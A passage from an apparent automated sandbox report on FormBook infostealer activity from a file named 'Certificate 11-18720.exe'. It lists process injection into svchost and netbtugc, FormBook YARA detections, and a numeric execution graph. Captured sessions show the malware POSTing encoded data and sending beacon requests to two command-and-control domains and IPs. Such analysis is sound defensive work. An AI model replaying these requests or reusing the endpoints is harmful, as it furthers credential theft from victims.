                                                                                  17 | 192.168.2.4 | 50019 | 195.110.124.133 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:34.420121908 CET | 800 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                                                                  Nov 25, 2024 18:14:35.873465061 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:35 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.4 | 50020 | 195.110.124.133 | 80 | 5580 | C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 25, 2024 18:14:37.070976019 CET | 820 | OUT | POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: 7BpTBrLp=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
Nov 25, 2024 18:14:38.425026894 CET  367  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:38 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 19  Source IP: 192.168.2.4  Source Port: 50021  Destination IP: 195.110.124.133  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:14:39.727935076 CET  10902  OUT  POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Origin: http://www.elettrosistemista.zip
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:14:41.151376963 CET  367  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:40 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 20  Source IP: 192.168.2.4  Source Port: 50022  Destination IP: 195.110.124.133  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:14:42.396215916 CET  513  OUT  GET /fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.elettrosistemista.zip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:14:43.704267979 CET  367  IN  HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 25 Nov 2024 17:14:43 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 203
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


Session ID: 21  Source IP: 192.168.2.4  Source Port: 50023  Destination IP: 217.196.55.202  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:15:06.287043095 CET  788  OUT  POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: 7BpTBrLp=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuvNrjum00ILaG2A9EhuHXhtN83j3R+WRkA==
Nov 25, 2024 18:15:07.583836079 CET  1085  IN  HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:07 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 22  Source IP: 192.168.2.4  Source Port: 50024  Destination IP: 217.196.55.202  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:15:08.931967020 CET  808  OUT  POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Ascii: 7BpTBrLp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJ+hwqDc9rY/J2jmDX4mE7LNNJTJWekjko=
Nov 25, 2024 18:15:10.214279890 CET  1085  IN  HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:10 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 23  Source IP: 192.168.2.4  Source Port: 50025  Destination IP: 217.196.55.202  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:15:11.594854116 CET  10890  OUT  POST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.empowermedeco.com
                                                                                  Origin: http://www.empowermedeco.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:15:12.854144096 CET  1085  IN  HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:12 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


Session ID: 24  Source IP: 192.168.2.4  Source Port: 50026  Destination IP: 217.196.55.202  Destination Port: 80  PID: 5580  Process: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Timestamp  Bytes transferred  Direction  Data
Nov 25, 2024 18:15:14.328917027 CET  509  OUT  GET /fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.empowermedeco.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Nov 25, 2024 18:15:15.645354033 CET | 1226 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  content-type: text/html
                                                                                  content-length: 795
                                                                                  date: Mon, 25 Nov 2024 17:15:15 GMT
                                                                                  server: LiteSpeed
                                                                                  location: https://www.empowermedeco.com/fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd
                                                                                  platform: hostinger
                                                                                  panel: hpanel
                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>



Target ID: 0
Start time: 12:11:13
Start date: 25/11/2024
Path: C:\Users\user\Desktop\Certificate 11-18720.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Certificate 11-18720.exe"
Imagebase: 0x5c0000
File size: 1'197'568 bytes
MD5 hash: 287E61624E5C839FF4B366E1969B3BCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 1
Start time: 12:11:14
Start date: 25/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Certificate 11-18720.exe"
Imagebase: 0xee0000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: true

Target ID: 2
Start time: 12:11:22
Start date: 25/11/2024
Path: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe"
Imagebase: 0x100000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 3
Start time: 12:11:24
Start date: 25/11/2024
Path: C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\netbtugc.exe"
Imagebase: 0x990000
File size: 22'016 bytes
MD5 hash: EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: false

Target ID: 7
Start time: 12:11:37
Start date: 25/11/2024
Path: C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe"
Imagebase: 0x100000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation: high
Has exited: false

Target ID: 8
Start time: 12:11:49
Start date: 25/11/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff6bf500000
File size: 676'768 bytes
MD5 hash: C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true


Execution Graph

Execution Coverage: 4%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 8.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 161
633006 92787->92788 92788->92788 92790 5c6ef8 92789->92790 92791 5c622b 92789->92791 93350 5cdd47 48 API calls ___crtGetEnvironmentStringsW 92790->93350 92793 5c9048 92791->92793 92794 5df4ea 48 API calls 92793->92794 92795 5c6237 92794->92795 92795->92513 92797 5cd6f4 92796->92797 92798 5cd71b 92797->92798 93351 5cd764 55 API calls 92797->93351 92798->92516 92801 5cd654 92800->92801 92808 5cd67e 92800->92808 92802 5cd65b 92801->92802 92804 5cd6c2 92801->92804 92803 5cd666 92802->92803 92809 5cd6ab 92802->92809 93352 5cd9a0 53 API calls __cinit 92803->93352 92804->92809 93354 5ddce0 53 API calls 92804->93354 92808->92524 92809->92808 93353 5ddce0 53 API calls 92809->93353 92811 5c641f 92810->92811 92812 5c6406 92810->92812 92814 5c6a63 48 API calls 92811->92814 92813 5c6eed 48 API calls 92812->92813 92815 5c62d1 92813->92815 92814->92815 92816 5e0fa7 92815->92816 92817 5e1028 92816->92817 92818 5e0fb3 92816->92818 93357 5e103a 59 API calls 3 library calls 92817->93357 92825 5e0fd8 92818->92825 93355 5e7c0e 47 API calls __getptd_noexit 92818->93355 92821 5e1035 92821->92530 92822 5e0fbf 93356 5e6e10 8 API calls __beginthread 92822->93356 92824 5e0fca 92824->92530 92825->92530 92827 5dc064 92826->92827 92829 5dc069 Mailbox 92826->92829 93358 5dc1af 48 API calls 92827->93358 92830 5dc077 92829->92830 93359 5dc15c 48 API calls 92829->93359 92832 5df4ea 48 API calls 92830->92832 92833 5dc152 92830->92833 92834 5dc108 92832->92834 92833->92562 92835 5df4ea 48 API calls 92834->92835 92836 5dc113 92835->92836 92836->92562 92836->92836 92838 5d1cf6 92837->92838 92840 5d1ba2 92837->92840 92838->92569 92839 5d1bae 92847 5d1bb9 92839->92847 93361 5dc15c 48 API calls 92839->93361 92840->92839 92842 5df4ea 48 API calls 92840->92842 92843 6349c4 92842->92843 92845 5df4ea 48 API calls 92843->92845 92844 5d1c5d 92844->92569 92852 6349cf 92845->92852 92846 5df4ea 48 API calls 92848 5d1c9f 92846->92848 92847->92844 92847->92846 92849 5d1cb2 92848->92849 93360 5c2925 48 API calls 
92848->93360 92849->92569 92851 5df4ea 48 API calls 92851->92852 92852->92839 92852->92851 92853->92569 92863 5cbdfa 92854->92863 92856 5c61b1 92856->92767 92858 5c651b 92857->92858 92862 5c64dd ___crtGetEnvironmentStringsW 92857->92862 92860 5df4ea 48 API calls 92858->92860 92859 5df4ea 48 API calls 92861 5c64e4 92859->92861 92860->92862 92861->92775 92862->92859 92864 5cbe0d 92863->92864 92868 5cbe0a ___crtGetEnvironmentStringsW 92863->92868 92865 5df4ea 48 API calls 92864->92865 92866 5cbe17 92865->92866 92869 5dee75 92866->92869 92868->92856 92871 5df4ea __calloc_impl 92869->92871 92870 5e395c _W_store_winword 47 API calls 92870->92871 92871->92870 92872 5df50c 92871->92872 92873 5df50e std::exception::exception 92871->92873 92872->92868 92878 5e6805 RaiseException 92873->92878 92875 5df538 92879 5e673b 47 API calls _free 92875->92879 92877 5df54a 92877->92868 92878->92875 92879->92877 92945 5c4214 92880->92945 92885 634f73 92888 5c4252 84 API calls 92885->92888 92886 5c41d4 LoadLibraryExW 92955 5c4291 92886->92955 92889 634f7a 92888->92889 92891 5c4291 3 API calls 92889->92891 92893 634f82 92891->92893 92981 5c44ed 92893->92981 92894 5c41fb 92894->92893 92895 5c4207 92894->92895 92897 5c4252 84 API calls 92895->92897 92899 5c39fe 92897->92899 92899->92780 92904 60c396 92899->92904 92901 634fa9 92989 5c4950 92901->92989 92903 634fb6 92905 5c4517 83 API calls 92904->92905 92906 60c405 92905->92906 93170 60c56d 92906->93170 92909 5c44ed 64 API calls 92910 60c432 